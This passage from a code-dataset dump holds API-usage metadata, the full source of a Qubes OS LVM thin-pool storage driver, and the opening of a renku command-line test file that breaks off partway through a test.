"api": [{"api_name": "Code.dataInput.readRoutes", "line_number": 16, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 16, "usage_type": "name"}, {"api_name": "Code.dataInput.readTravelDurations", "line_number": 18, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 18, "usage_type": "name"}, {"api_name": "Code.dataInput.readStoreCoordinates", "line_number": 19, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 19, "usage_type": "name"}, {"api_name": "Code.routing.Pathfinder", "line_number": 22, "usage_type": "call"}, {"api_name": "Code.routing", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 48, "usage_type": "name"}, {"api_name": "Code.routing.Region", "line_number": 51, "usage_type": "call"}, {"api_name": "Code.routing", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 70, "usage_type": "name"}, {"api_name": "Code.linearProgram.findBestPartition", "line_number": 90, "usage_type": "call"}, {"api_name": "Code.linearProgram", "line_number": 90, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 102, "usage_type": "attribute"}, {"api_name": "scipy.stats.norm.rvs", "line_number": 107, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 107, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 107, "usage_type": "name"}, {"api_name": "scipy.stats.uniform.rvs", "line_number": 109, "usage_type": "call"}, {"api_name": "scipy.stats.uniform", "line_number": 109, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 109, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 139, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 139, "usage_type": "name"}, {"api_name": "scipy.stats.norm.rvs", "line_number": 148, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 148, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 195, "usage_type": "name"}, {"api_name": "Code.dataInput.readAverageDemands", "line_number": 199, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 199, "usage_type": "name"}, {"api_name": "Code.dataInput.readLocationGroups", "line_number": 200, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 222, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 222, "usage_type": "name"}, {"api_name": "Code.dataInput.readDataWithStats", "line_number": 230, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 230, "usage_type": "name"}, {"api_name": "Code.dataInput.readSaturdayWithStats", "line_number": 231, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 231, "usage_type": "name"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 237, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 237, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 258, "usage_type": "name"}, {"api_name": "Code.dataInput.readDemandsWithStoreClosure", "line_number": 261, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 261, "usage_type": "name"}, {"api_name": "Code.dataInput.readLocationGroupsWithStoreClosure", "line_number": 264, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 264, "usage_type": "name"}, {"api_name": "numpy.random.seed", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 291, "usage_type": "attribute"}, {"api_name": "Code.dataInput.storeRoutes", "line_number": 302, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 302, "usage_type": "name"}, {"api_name": "Code.dataInput.readRoutes", "line_number": 304, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 304, "usage_type": "name"}, {"api_name": "Code.dataInput.readAverageDemands", "line_number": 310, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 310, "usage_type": "name"}, {"api_name": "Code.dataInput.storeRoutes", "line_number": 327, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 327, "usage_type": "name"}, {"api_name": "Code.dataInput.readRoutes", "line_number": 329, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 329, "usage_type": "name"}, {"api_name": "Code.dataInput.readAverageDemands", "line_number": 335, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 335, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 369, "usage_type": "call"}, {"api_name": "Code.dataInput.storeRoutes", "line_number": 377, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 377, "usage_type": "name"}, {"api_name": "Code.dataInput.readRoutes", "line_number": 379, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 379, "usage_type": "name"}, {"api_name": "Code.dataInput.readDemandsWithStoreClosure", "line_number": 385, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 385, "usage_type": "name"}]} +{"seq_id": "22009028157", "text": "import logging\nimport operator\nimport os\nimport subprocess\n\nimport time\n\nimport asyncio\n\nimport qubes\nimport qubes.storage\nimport qubes.utils\n\n\ndef check_lvm_version():\n #Check if lvm is very very old, like in Travis-CI\n try:\n lvm_help = subprocess.check_output(['lvm', 'lvcreate', '--help'],\n stderr=subprocess.DEVNULL).decode()\n return '--setactivationskip' not in lvm_help\n except (subprocess.CalledProcessError, FileNotFoundError):\n pass\n\nlvm_is_very_old = check_lvm_version()\n\nclass ThinPool(qubes.storage.Pool):\n ''' LVM Thin based pool implementation\n ''' # pylint: disable=protected-access\n\n size_cache = None\n\n driver = 'lvm_thin'\n\n def __init__(self, volume_group, thin_pool, revisions_to_keep=1, **kwargs):\n super(ThinPool, self).__init__(revisions_to_keep=revisions_to_keep,\n **kwargs)\n self.volume_group = volume_group\n self.thin_pool = thin_pool\n self._pool_id = \"{!s}/{!s}\".format(volume_group, thin_pool)\n self.log = logging.getLogger('qubes.storage.lvm.%s' % self._pool_id)\n\n self._volume_objects_cache = {}\n\n @property\n def config(self):\n return {\n 'name': self.name,\n 'volume_group': self.volume_group,\n 'thin_pool': self.thin_pool,\n 'driver': ThinPool.driver\n }\n\n def destroy(self):\n pass # TODO Should we remove an existing pool?\n\n def init_volume(self, vm, volume_config):\n ''' Initialize a :py:class:`qubes.storage.Volume` from `volume_config`.\n '''\n\n if 'revisions_to_keep' not in volume_config.keys():\n volume_config['revisions_to_keep'] = self.revisions_to_keep\n if 'vid' not in volume_config.keys():\n if vm and hasattr(vm, 'name'):\n vm_name = vm.name\n else:\n # for the future if we have volumes not belonging to a vm\n vm_name = qubes.utils.random_string()\n\n assert self.name\n\n volume_config['vid'] = \"{!s}/vm-{!s}-{!s}\".format(\n self.volume_group, vm_name, volume_config['name'])\n\n volume_config['volume_group'] = self.volume_group\n volume_config['pool'] = self\n volume = ThinVolume(**volume_config)\n self._volume_objects_cache[volume_config['vid']] = volume\n return volume\n\n def setup(self):\n reset_cache()\n cache_key = self.volume_group + '/' + self.thin_pool\n if cache_key not in size_cache:\n raise qubes.storage.StoragePoolException(\n 'Thin pool {} does not exist'.format(cache_key))\n if size_cache[cache_key]['attr'][0] != 't':\n raise qubes.storage.StoragePoolException(\n 'Volume {} is not a thin pool'.format(cache_key))\n # TODO Should we create a non existing pool?\n\n def get_volume(self, vid):\n ''' Return a volume with given vid'''\n if vid in self._volume_objects_cache:\n return self._volume_objects_cache[vid]\n\n config = {\n 'pool': self,\n 'vid': vid,\n 'name': vid,\n 'volume_group': self.volume_group,\n }\n # don't cache this object, as it doesn't carry full configuration\n return ThinVolume(**config)\n\n def list_volumes(self):\n ''' Return a list of volumes managed by this pool '''\n volumes = []\n for vid, vol_info in size_cache.items():\n if not vid.startswith(self.volume_group + '/'):\n continue\n if vol_info['pool_lv'] != self.thin_pool:\n continue\n if vid.endswith('-snap'):\n # implementation detail volume\n continue\n if vid.endswith('-back'):\n # old revisions\n continue\n config = {\n 'pool': self,\n 'vid': vid,\n 'name': vid,\n 'volume_group': self.volume_group,\n 'rw': vol_info['attr'][1] == 'w',\n }\n volumes += [ThinVolume(**config)]\n return volumes\n\n @property\n def size(self):\n try:\n return qubes.storage.lvm.size_cache[\n self.volume_group + '/' + self.thin_pool]['size']\n except KeyError:\n return 0\n\n @property\n def usage(self):\n try:\n return qubes.storage.lvm.size_cache[\n self.volume_group + '/' + self.thin_pool]['usage']\n except KeyError:\n return 0\n\n\ndef init_cache(log=logging.getLogger('qubes.storage.lvm')):\n cmd = ['lvs', '--noheadings', '-o',\n 'vg_name,pool_lv,name,lv_size,data_percent,lv_attr,origin',\n '--units', 'b', '--separator', ';']\n if os.getuid() != 0:\n cmd.insert(0, 'sudo')\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n close_fds=True)\n out, err = p.communicate()\n return_code = p.returncode\n if return_code == 0 and err:\n log.warning(err)\n elif return_code != 0:\n raise qubes.storage.StoragePoolException(err)\n\n result = {}\n\n for line in out.splitlines():\n line = line.decode().strip()\n pool_name, pool_lv, name, size, usage_percent, attr, \\\n origin = line.split(';', 6)\n if '' in [pool_name, name, size, usage_percent]:\n continue\n name = pool_name + \"/\" + name\n size = int(size[:-1]) # Remove 'B' suffix\n usage = int(size / 100 * float(usage_percent))\n result[name] = {'size': size, 'usage': usage, 'pool_lv': pool_lv,\n 'attr': attr, 'origin': origin}\n\n return result\n\n\nsize_cache = init_cache()\n\nclass ThinVolume(qubes.storage.Volume):\n ''' Default LVM thin volume implementation\n ''' # pylint: disable=too-few-public-methods\n\n\n def __init__(self, volume_group, size=0, **kwargs):\n self.volume_group = volume_group\n super(ThinVolume, self).__init__(size=size, **kwargs)\n self.log = logging.getLogger('qubes.storage.lvm.%s' % str(self.pool))\n\n if self.snap_on_start or self.save_on_stop:\n self._vid_snap = self.vid + '-snap'\n\n self._size = size\n\n @property\n def path(self):\n return '/dev/' + self.vid\n\n @property\n def revisions(self):\n name_prefix = self.vid + '-'\n revisions = {}\n for revision_vid in size_cache:\n if not revision_vid.startswith(name_prefix):\n continue\n if not revision_vid.endswith('-back'):\n continue\n revision_vid = revision_vid[len(name_prefix):]\n seconds = int(revision_vid[:-len('-back')])\n iso_date = qubes.storage.isodate(seconds).split('.', 1)[0]\n revisions[revision_vid] = iso_date\n return revisions\n\n @property\n def size(self):\n try:\n if self.is_dirty():\n return qubes.storage.lvm.size_cache[self._vid_snap]['size']\n return qubes.storage.lvm.size_cache[self.vid]['size']\n except KeyError:\n return self._size\n\n @size.setter\n def size(self, _):\n raise qubes.storage.StoragePoolException(\n \"You shouldn't use lvm size setter\")\n\n def _reset(self):\n ''' Resets a volatile volume '''\n assert not self.snap_on_start and not self.save_on_stop, \\\n \"Not a volatile volume\"\n self.log.debug('Resetting volatile %s', self.vid)\n try:\n cmd = ['remove', self.vid]\n qubes_lvm(cmd, self.log)\n except qubes.storage.StoragePoolException:\n pass\n # pylint: disable=protected-access\n cmd = ['create', self.pool._pool_id, self.vid.split('/')[1],\n str(self.size)]\n qubes_lvm(cmd, self.log)\n\n def _remove_revisions(self, revisions=None):\n '''Remove old volume revisions.\n\n If no revisions list is given, it removes old revisions according to\n :py:attr:`revisions_to_keep`\n\n :param revisions: list of revisions to remove\n '''\n if revisions is None:\n revisions = sorted(self.revisions.items(),\n key=operator.itemgetter(1))\n # pylint: disable=invalid-unary-operand-type\n revisions = revisions[:(-self.revisions_to_keep) or None]\n revisions = [rev_id for rev_id, _ in revisions]\n\n for rev_id in revisions:\n try:\n cmd = ['remove', self.vid + '-' + rev_id]\n qubes_lvm(cmd, self.log)\n except qubes.storage.StoragePoolException:\n pass\n\n def _commit(self):\n msg = \"Trying to commit {!s}, but it has save_on_stop == False\"\n msg = msg.format(self)\n assert self.save_on_stop, msg\n\n msg = \"Trying to commit {!s}, but it has rw == False\"\n msg = msg.format(self)\n assert self.rw, msg\n assert hasattr(self, '_vid_snap')\n\n if self.revisions_to_keep > 0:\n cmd = ['clone', self.vid,\n '{}-{}-back'.format(self.vid, int(time.time()))]\n qubes_lvm(cmd, self.log)\n reset_cache()\n self._remove_revisions()\n\n # TODO: when converting this function to coroutine, this _must_ be\n # under a lock\n # remove old volume only after _successful_ clone of the new one\n cmd = ['rename', self.vid, self.vid + '-tmp']\n qubes_lvm(cmd, self.log)\n try:\n cmd = ['clone', self._vid_snap, self.vid]\n qubes_lvm(cmd, self.log)\n except:\n # restore original volume\n cmd = ['rename', self.vid + '-tmp', self.vid]\n qubes_lvm(cmd, self.log)\n raise\n else:\n cmd = ['remove', self.vid + '-tmp']\n qubes_lvm(cmd, self.log)\n\n\n def create(self):\n assert self.vid\n assert self.size\n if self.save_on_stop:\n if self.source:\n cmd = ['clone', str(self.source), self.vid]\n else:\n cmd = [\n 'create',\n self.pool._pool_id, # pylint: disable=protected-access\n self.vid.split('/', 1)[1],\n str(self.size)\n ]\n qubes_lvm(cmd, self.log)\n reset_cache()\n return self\n\n def remove(self):\n assert self.vid\n try:\n if os.path.exists('/dev/' + self._vid_snap):\n cmd = ['remove', self._vid_snap]\n qubes_lvm(cmd, self.log)\n except AttributeError:\n pass\n\n self._remove_revisions(self.revisions.keys())\n if not os.path.exists(self.path):\n return\n cmd = ['remove', self.vid]\n qubes_lvm(cmd, self.log)\n reset_cache()\n # pylint: disable=protected-access\n self.pool._volume_objects_cache.pop(self.vid, None)\n\n def export(self):\n ''' Returns an object that can be `open()`. '''\n # make sure the device node is available\n qubes_lvm(['activate', self.vid], self.log)\n devpath = '/dev/' + self.vid\n return devpath\n\n @asyncio.coroutine\n def import_volume(self, src_volume):\n if not src_volume.save_on_stop:\n return self\n\n # HACK: neat trick to speed up testing if you have same physical thin\n # pool assigned to two qubes-pools i.e: qubes_dom0 and test-lvm\n # pylint: disable=line-too-long\n if isinstance(src_volume.pool, ThinPool) and \\\n src_volume.pool.thin_pool == self.pool.thin_pool: # NOQA\n cmd = ['remove', self.vid]\n qubes_lvm(cmd, self.log)\n cmd = ['clone', str(src_volume), str(self)]\n qubes_lvm(cmd, self.log)\n else:\n if src_volume.size != self.size:\n self.resize(src_volume.size)\n src_path = src_volume.export()\n cmd = ['dd', 'if=' + src_path, 'of=/dev/' + self.vid,\n 'conv=sparse']\n p = yield from asyncio.create_subprocess_exec(*cmd)\n yield from p.wait()\n if p.returncode != 0:\n raise qubes.storage.StoragePoolException(\n 'Failed to import volume {!r}, dd exit code: {}'.format(\n src_volume, p.returncode))\n reset_cache()\n\n return self\n\n def import_data(self):\n ''' Returns an object that can be `open()`. '''\n devpath = '/dev/' + self.vid\n return devpath\n\n def is_dirty(self):\n if self.save_on_stop:\n return os.path.exists('/dev/' + self._vid_snap)\n return False\n\n def is_outdated(self):\n if not self.snap_on_start:\n return False\n if self._vid_snap not in size_cache:\n return False\n return (size_cache[self._vid_snap]['origin'] !=\n self.source.vid.split('/')[1])\n\n\n def revert(self, revision=None):\n if revision is None:\n revision = \\\n max(self.revisions.items(), key=operator.itemgetter(1))[0]\n old_path = self.path + '-' + revision\n if not os.path.exists(old_path):\n msg = \"Volume {!s} has no {!s}\".format(self, old_path)\n raise qubes.storage.StoragePoolException(msg)\n\n cmd = ['remove', self.vid]\n qubes_lvm(cmd, self.log)\n cmd = ['clone', self.vid + '-' + revision, self.vid]\n qubes_lvm(cmd, self.log)\n reset_cache()\n return self\n\n def resize(self, size):\n ''' Expands volume, throws\n :py:class:`qubst.storage.qubes.storage.StoragePoolException` if\n given size is less than current_size\n '''\n if not self.rw:\n msg = 'Can not resize reađonly volume {!s}'.format(self)\n raise qubes.storage.StoragePoolException(msg)\n\n if size < self.size:\n raise qubes.storage.StoragePoolException(\n 'For your own safety, shrinking of %s is'\n ' disabled (%d < %d). If you really know what you'\n ' are doing, use `lvresize` on %s manually.' %\n (self.name, size, self.size, self.vid))\n\n if size == self.size:\n return\n\n if self.is_dirty():\n cmd = ['extend', self._vid_snap, str(size)]\n qubes_lvm(cmd, self.log)\n elif self.save_on_stop or not self.snap_on_start:\n cmd = ['extend', self.vid, str(size)]\n qubes_lvm(cmd, self.log)\n reset_cache()\n\n def _snapshot(self):\n try:\n cmd = ['remove', self._vid_snap]\n qubes_lvm(cmd, self.log)\n except: # pylint: disable=bare-except\n pass\n\n if self.source is None:\n cmd = ['clone', self.vid, self._vid_snap]\n else:\n cmd = ['clone', str(self.source), self._vid_snap]\n qubes_lvm(cmd, self.log)\n\n\n def start(self):\n try:\n if self.snap_on_start or self.save_on_stop:\n if not self.save_on_stop or not self.is_dirty():\n self._snapshot()\n else:\n self._reset()\n finally:\n reset_cache()\n return self\n\n def stop(self):\n try:\n if self.save_on_stop:\n self._commit()\n if self.snap_on_start or self.save_on_stop:\n cmd = ['remove', self._vid_snap]\n qubes_lvm(cmd, self.log)\n else:\n cmd = ['remove', self.vid]\n qubes_lvm(cmd, self.log)\n finally:\n reset_cache()\n return self\n\n def verify(self):\n ''' Verifies the volume. '''\n if not self.save_on_stop and not self.snap_on_start:\n # volatile volumes don't need any files\n return True\n if self.source is not None:\n vid = str(self.source)\n else:\n vid = self.vid\n try:\n vol_info = size_cache[vid]\n if vol_info['attr'][4] != 'a':\n raise qubes.storage.StoragePoolException(\n 'volume {} not active'.format(vid))\n except KeyError:\n raise qubes.storage.StoragePoolException(\n 'volume {} missing'.format(vid))\n return True\n\n\n def block_device(self):\n ''' Return :py:class:`qubes.storage.BlockDevice` for serialization in\n the libvirt XML template as .\n '''\n if self.snap_on_start or self.save_on_stop:\n return qubes.storage.BlockDevice(\n '/dev/' + self._vid_snap, self.name, self.script,\n self.rw, self.domain, self.devtype)\n\n return super(ThinVolume, self).block_device()\n\n @property\n def usage(self): # lvm thin usage always returns at least the same usage as\n # the parent\n try:\n return qubes.storage.lvm.size_cache[self.vid]['usage']\n except KeyError:\n return 0\n\n\ndef pool_exists(pool_id):\n ''' Return true if pool exists '''\n try:\n vol_info = size_cache[pool_id]\n return vol_info['attr'][0] == 't'\n except KeyError:\n return False\n\n\ndef qubes_lvm(cmd, log=logging.getLogger('qubes.storage.lvm')):\n ''' Call :program:`lvm` to execute an LVM operation '''\n action = cmd[0]\n if action == 'remove':\n lvm_cmd = ['lvremove', '-f', cmd[1]]\n elif action == 'clone':\n lvm_cmd = ['lvcreate', '-kn', '-ay', '-s', cmd[1], '-n', cmd[2]]\n elif action == 'create':\n lvm_cmd = ['lvcreate', '-T', cmd[1], '-kn', '-ay', '-n', cmd[2], '-V',\n str(cmd[3]) + 'B']\n elif action == 'extend':\n size = int(cmd[2]) / (1024 * 1024)\n lvm_cmd = [\"lvextend\", \"-L%s\" % size, cmd[1]]\n elif action == 'activate':\n lvm_cmd = ['lvchange', '-ay', cmd[1]]\n elif action == 'rename':\n lvm_cmd = ['lvrename', cmd[1], cmd[2]]\n else:\n raise NotImplementedError('unsupported action: ' + action)\n if lvm_is_very_old:\n # old lvm in trusty image used there does not support -k option\n lvm_cmd = [x for x in lvm_cmd if x != '-kn']\n if os.getuid() != 0:\n cmd = ['sudo', 'lvm'] + lvm_cmd\n else:\n cmd = ['lvm'] + lvm_cmd\n environ = os.environ.copy()\n environ['LC_ALL'] = 'C.utf8'\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n close_fds=True, env=environ)\n out, err = p.communicate()\n return_code = p.returncode\n if out:\n log.debug(out)\n if return_code == 0 and err:\n log.warning(err)\n elif return_code != 0:\n assert err, \"Command exited unsuccessful, but printed nothing to stderr\"\n raise qubes.storage.StoragePoolException(err)\n return True\n\n\ndef reset_cache():\n qubes.storage.lvm.size_cache = init_cache()\n", "repo_name": "iamforprog/All_respository", "sub_path": "qubes/storage/lvm.py", "file_name": "lvm.py", "file_ext": "py", "file_size_in_byte": 18861, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "subprocess.check_output", "line_number": 18, "usage_type": "call"}, {"api_name": "subprocess.DEVNULL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 21, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "qubes.utils.random_string", "line_number": 67, "usage_type": "call"}, {"api_name": "qubes.utils", "line_number": 67, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 84, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 84, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 87, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 87, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 132, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 140, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 146, "usage_type": "call"}, {"api_name": "os.getuid", "line_number": 150, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 152, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 152, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 159, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 159, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 180, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 188, "usage_type": "call"}, {"api_name": "qubes.storage.isodate", "line_number": 210, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 210, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 218, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 219, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 225, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 225, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 236, "usage_type": "attribute"}, {"api_name": "operator.itemgetter", "line_number": 253, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 262, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 320, "usage_type": "call"}, {"api_name": "os.path", "line_number": 320, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 327, "usage_type": "call"}, {"api_name": "os.path", "line_number": 327, "usage_type": "attribute"}, {"api_name": "asyncio.create_subprocess_exec", "line_number": 362, "usage_type": "call"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 365, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 365, "usage_type": "attribute"}, {"api_name": "asyncio.coroutine", "line_number": 342, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 379, "usage_type": "call"}, {"api_name": "os.path", "line_number": 379, "usage_type": "attribute"}, {"api_name": "operator.itemgetter", "line_number": 394, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 396, "usage_type": "call"}, {"api_name": "os.path", "line_number": 396, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 398, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 398, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 414, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 414, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 417, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 417, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 485, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 485, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 488, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 488, "usage_type": "attribute"}, {"api_name": "qubes.storage.BlockDevice", "line_number": 498, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 498, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 508, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 522, "usage_type": "call"}, {"api_name": "os.getuid", "line_number": 544, "usage_type": "call"}, {"api_name": "os.environ.copy", "line_number": 548, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 548, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 550, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 550, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 560, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 560, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 565, "usage_type": "attribute"}]} +{"seq_id": "19490090694", "text": "from __future__ import absolute_import, print_function\n\nimport contextlib\nimport os\nimport shutil\nimport sys\nfrom subprocess import call\n\nimport git\nimport pytest\nimport yaml\n\nfrom renku import __version__, cli\nfrom renku._compat import Path\nfrom renku.models.cwl.workflow import Workflow\n\n\ndef _run_update(runner, capsys, args=('update', )):\n \"\"\"Run the update command.\"\"\"\n with capsys.disabled():\n try:\n cli.cli.main(\n args=args,\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n return 0 if e.code is None else e.code\n except Exception:\n raise\n\n\ndef test_version(base_runner):\n \"\"\"Test cli version.\"\"\"\n result = base_runner.invoke(cli.cli, ['--version'])\n assert __version__ in result.output.split('\\n')\n\n\n@pytest.mark.parametrize('arg', (('help', ), ('-h', ), ('--help', )))\ndef test_help(arg, base_runner):\n \"\"\"Test cli help.\"\"\"\n result = base_runner.invoke(cli.cli, [arg])\n assert result.exit_code == 0\n assert 'Show this message and exit.' in result.output\n\n\ndef test_config_path(instance_path, base_runner):\n \"\"\"Test config path.\"\"\"\n result = base_runner.invoke(cli.cli, ['--config-path'])\n output = result.output.split('\\n')[0]\n assert 'config.yml' in output\n assert instance_path in output\n\n\ndef test_init(base_runner):\n \"\"\"Test project initialization.\"\"\"\n runner = base_runner\n\n # 1. the directory must exist\n result = runner.invoke(cli.cli, ['init', 'test-project'])\n assert result.exit_code == 2\n\n # 2. test project directory creation\n os.mkdir('test-project')\n result = runner.invoke(cli.cli, ['init', 'test-project'])\n assert result.exit_code == 0\n assert os.stat(os.path.join('test-project', '.git'))\n assert os.stat(os.path.join('test-project', '.renku'))\n\n # 3. test project init from already existing renku repository\n os.chdir('test-project')\n result = runner.invoke(cli.cli, ['init'])\n assert result.exit_code != 0\n\n # 4. in case of init failure because of existing .git folder\n # .renku directory should not exist\n assert not os.path.exists(os.path.join('test-project', '.renku'))\n\n result = runner.invoke(cli.cli, ['init', '--force'])\n assert result.exit_code == 0\n assert os.stat(os.path.join('.git'))\n assert os.stat(os.path.join('.renku'))\n\n # 4. check git lfs init options\n os.chdir('../')\n shutil.rmtree('test-project')\n os.mkdir('test-project')\n os.chdir('test-project')\n result = runner.invoke(cli.cli, ['init', '--no-external-storage'])\n with open('.git/config') as f:\n config = f.read()\n assert 'filter \"lfs\"' not in config\n\n result = runner.invoke(cli.cli, ['init', '--force'])\n with open('.git/config') as f:\n config = f.read()\n assert 'filter \"lfs\"' in config\n\n\ndef test_workon(runner):\n \"\"\"Test switching branches.\"\"\"\n # Create first issue\n result = runner.invoke(cli.cli, ['workon', '1'])\n assert result.exit_code == 0\n\n result = runner.invoke(cli.cli, ['deactivate'])\n assert result.exit_code == 0\n\n # Enter existing\n result = runner.invoke(cli.cli, ['workon', '1'])\n assert result.exit_code == 0\n\n result = runner.invoke(cli.cli, ['deactivate'])\n assert result.exit_code == 0\n\n\ndef test_run_simple(runner):\n \"\"\"Test tracking of run command.\"\"\"\n cmd = ['echo', 'test']\n result = runner.invoke(cli.cli, ['run', '--no-output'] + cmd)\n assert result.exit_code == 0\n\n\ndef test_workflow(runner):\n \"\"\"Test workflow command.\"\"\"\n result = runner.invoke(cli.cli, ['run', 'touch', 'data.csv'])\n assert result.exit_code == 0\n\n with open('counted.txt', 'w') as stdout:\n with contextlib.redirect_stdout(stdout):\n try:\n cli.cli.main(\n args=('run', 'wc', 'data.csv'),\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n\n result = runner.invoke(\n cli.cli, ['workflow', 'create', 'counted.txt', '-o', 'workflow.cwl']\n )\n assert result.exit_code == 0\n\n with open('workflow.cwl', 'r') as f:\n workflow = Workflow.from_cwl(yaml.load(f))\n assert workflow.steps[0].run.startswith('.renku/workflow/')\n\n # Compare default log and log for a specific file.\n result_default = runner.invoke(cli.cli, ['log'])\n result_arg = runner.invoke(cli.cli, ['log', 'counted.txt'])\n\n assert result_default.exit_code == 0\n assert result_arg.exit_code == 0\n assert result_default.output == result_arg.output\n\n\ndef test_streams(runner, capsys):\n \"\"\"Test redirection of std streams.\"\"\"\n repo = git.Repo('.')\n\n with open('source.txt', 'w') as source:\n source.write('first,second,third')\n\n repo.git.add('--all')\n repo.index.commit('Added source.txt')\n\n with capsys.disabled():\n with open('source.txt', 'rb') as stdin:\n with open('result.txt', 'wb') as stdout:\n try:\n old_stdin, old_stdout = sys.stdin, sys.stdout\n sys.stdin, sys.stdout = stdin, stdout\n try:\n cli.cli.main(\n args=('run', 'cut', '-d,', '-f', '2', '-s'),\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdin, sys.stdout = old_stdin, old_stdout\n\n with open('result.txt', 'r') as f:\n assert f.read().strip() == 'second'\n\n result = runner.invoke(cli.cli, ['workflow', 'create', 'result.txt'])\n assert result.exit_code == 0\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 0\n\n with 